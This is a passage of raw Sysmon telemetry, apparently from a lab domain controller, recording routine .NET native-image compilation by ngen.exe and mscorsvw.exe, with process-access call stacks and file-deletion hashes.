AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\KFRAJX6IT0\System.Runtime.Serialization.Formatters.Soap.ni.dllMD5=5360CAE3B32A50623B6658904333765E,SHA256=E7678E146ED6DF0FA004BA53B98781A525065882502F7BCFF4579E279E3DFE40,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023763Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.655{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E405-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023762Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.639{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E405-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023761Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.639{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E405-00000000CF01}6484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023760Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.639{4DB9351A-A287-60D3-E305-00000000CF01}6924NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VU5NJH7ADA\System.Runtime.DurableInstancing.ni.dll.auxMD5=307E3CC74AF76C3001512E4E847541F8,SHA256=5F0B055C10C656DB0A95C62BDE097C18ACD3468E5539F641DD5D15B0E7377DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023759Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.639{4DB9351A-A287-60D3-E305-00000000CF01}6924NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VU5NJH7ADA\System.Runtime.DurableInstancing.ni.dllMD5=E912636684B8922DEAA0F7852E69BDC2,SHA256=179E1EF5E5CF983DA0D4B5551F02B48F8FE38074E85E5DC8D9216624B096140D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023758Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.639{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8B9094A1A6C79E518A65394CE8567A4,SHA256=C1A775C734FA5656BE87C2ADCF75BD1410AC8702ED827189FB26C78225D76A13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023757Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.623{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E305-00000000CF01}6924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023756Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.608{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E305-00000000CF01}6924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023755Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.608{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E305-00000000CF01}6924C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023754Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.592{4DB9351A-A287-60D3-E205-00000000CF01}6700NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8T36O0956W\System.Runtime.Caching.ni.dll.auxMD5=D4D6E9902AE4C89AD5D3AB31D394350A,SHA256=1C01C6E9D9D079D4ABE1EB29ABB4D04B6DB901F1A2321422F1F916884CFF70DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.592{4DB9351A-A287-60D3-E205-00000000CF01}6700NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8T36O0956W\System.Runtime.Caching.ni.dllMD5=7D3CA66BCFED4A2B48166CCD9624AADC,SHA256=8D29D80C8BCFB129F492A766F89A4FE13AD231349ECBEF6F7BAB82AE39815758,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E205-00000000CF01}6700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.561{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E205-00000000CF01}6700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.561{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E205-00000000CF01}6700C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.561{4DB9351A-A287-60D3-E105-00000000CF01}6792NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\25YIJMR6KL\System.Reflection.Context.ni.dll.auxMD5=AC61955337AAD7F2A3753843A6E7E5D4,SHA256=BC2DF9C88FCB1C4C99C8CEC2DA59CB5531FC35818EA92F9D1E6C253AB6F79A74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.561{4DB9351A-A287-60D3-E105-00000000CF01}6792NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\25YIJMR6KL\System.Reflection.Context.ni.dllMD5=58C9A2481B0656FFFE55722320C61AB4,SHA256=BD983B6E71238107EB8AE809937B30AAC4C569002B32121767CDEDAD6E97B1A0,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.530{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E105-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.514{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E105-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.514{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E105-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.498{4DB9351A-A287-60D3-E005-00000000CF01}4196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MBUHFVYSBM\System.Printing.ni.dll.auxMD5=B3012724ADD846503435A845E19B5044,SHA256=C8A78DBC2428FF33FE610F053921607F98AFC4338E33026528F960F726A32CEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.498{4DB9351A-A287-60D3-E005-00000000CF01}4196NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MBUHFVYSBM\System.Printing.ni.dllMD5=85B09DC0D6B104AB58DB3EE713AA8C63,SHA256=F7659FB5E4B64B6EF4594D71057E0A25D1DD48EC6E479A785344A47ADCB8B312,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.436{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-E005-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.420{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FC1ED9A32E6315DA82B4570D2E320E98,SHA256=91742412FFB72E36DAD20B25A25F8E8757BF4D47F113C1C6D64FBB14E05F8EA6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.420{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-E005-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.420{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-E005-00000000CF01}4196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.405{4DB9351A-A287-60D3-DF05-00000000CF01}6368NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IOHNMHUTWV\System.Numerics.ni.dll.auxMD5=CE6930972006310512989404006D3A20,SHA256=E07DF7253885653F8DF738FD5333C5A3CB2A557B86F06EE006829F336721BF32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.405{4DB9351A-A287-60D3-DF05-00000000CF01}6368NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IOHNMHUTWV\System.Numerics.ni.dllMD5=5795A7AC92B93543AE394A4A92F57A70,SHA256=D1424826745123816F16BF1ABEBB1F652603ACECB1702C038C34D458A2CF88A3,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.389{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DF05-00000000CF01}6368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.373{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DF05-00000000CF01}6368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.373{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DF05-00000000CF01}6368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.